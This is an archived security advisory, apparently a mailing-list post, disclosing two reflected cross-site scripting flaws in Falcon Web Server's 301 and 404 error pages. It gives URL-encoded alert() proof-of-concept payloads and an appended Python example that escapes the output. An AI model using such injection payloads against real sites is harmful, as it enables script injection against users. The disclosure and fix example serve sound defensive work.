Message-ID: <001f01c23f33$b3b71f80$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Cross-Site Scripting Issues in Falcon Web Server

From Developer:

"Falcon Web Server is running under Windows NT/2000/XP as well as Windows
95/98. It supports ISAPI and WinCGI, and it is a fully functional web
server which is capable of running a small / medium scale website of about
50-80 hits per minute.  The real advantage of Falcon Web Server is the
ability to run on a desktop computer with almost the same functionality as
large-scale web servers like MS IIS and Apache."

A lack of input sanitation in the error message output of this server makes
it susceptible to two cross-site scripting vulnerabilities:

* An issue in the way the server handles 301 messages when a file is not
found, and the request is not terminated by a slash.  Falcon simply adds a
slash to the request URI, and sends back a 301 with the following entity:

<html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>Redirecting browser to <a href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><br>If nothing happens click the link above.</body></html>

* An issue in the way the server handles 404 messages when a file/folder is
not found, and the necessary slash has been added (entity below):

<html><head><title>HTTP/1.0 404 Not Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not Found</h1><p>Cannot locate the requested file.</body></html>

Examples:

* 301 Message XSS

Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

* 404 Message XSS

http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

The 301 examples will simply add a slash and pass it on to the browser,
which then raises a 404, exploiting that vulnerability as well (although the
301 exploits will cause some useless HTML to be added on).

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown
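As an added defender-side illustration (not Falcon Web Server's code, whose source is not on this page), the two error bodies quoted in the advisory rebuilt in Python: once with the request path reflected raw, as the advisory describes, and once HTML-escaped for both the text context (title, h1) and the href attribute context. The request path is a constructed value and the function names are my own.

```python
"""Added example, not part of the advisory or of Falcon Web Server:
rebuilds the 301 and 404 error bodies with and without output escaping."""
import html
from urllib.parse import unquote

# Constructed request path, as a server would see it after percent-decoding
# the 404 example URI from the advisory.
CONSTRUCTED_PATH = unquote("/%3cscript%3ealert(%22xss%22)%3c/script%3e/")


def vulnerable_404(path: str) -> str:
    """Mirrors the reflection described in the advisory: path inserted raw."""
    return ("<html><head><title>HTTP/1.0 404 Not Found</title></head><body>"
            f"<h1>{path}index.html Not Found</h1>"
            "<p>Cannot locate the requested file.</body></html>")


def safe_404(path: str) -> str:
    """Same body, but the path is escaped before entering an HTML text context."""
    safe = html.escape(path, quote=True)
    return ("<html><head><title>HTTP/1.0 404 Not Found</title></head><body>"
            f"<h1>{safe}index.html Not Found</h1>"
            "<p>Cannot locate the requested file.</body></html>")


def safe_301(path: str) -> str:
    """Redirect body: the path appears both inside an href attribute and as
    element text. quote=True turns '"' into &quot;, so the attribute cannot
    be closed early, and '<' becomes &lt;, so no tag can be opened."""
    safe = html.escape(path + "/", quote=True)
    return (f"<html><head><title>{safe}</title></head><body>"
            f'Redirecting browser to <a href="{safe}">{safe}</a>'
            "<br>If nothing happens click the link above.</body></html>")


def reflects_raw_script(body: str) -> bool:
    """Detection-style check: does a literal <script> tag survive in the body?"""
    return "<script>" in body.lower()


if __name__ == "__main__":
    print("vulnerable 404 reflects script tag:",
          reflects_raw_script(vulnerable_404(CONSTRUCTED_PATH)))
    print("escaped 404 reflects script tag:",
          reflects_raw_script(safe_404(CONSTRUCTED_PATH)))
    print(safe_301(CONSTRUCTED_PATH))
```

The same escaping must be applied at every point where the path is echoed, including the three positions (title, href, link text) the advisory's 301 examples target.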
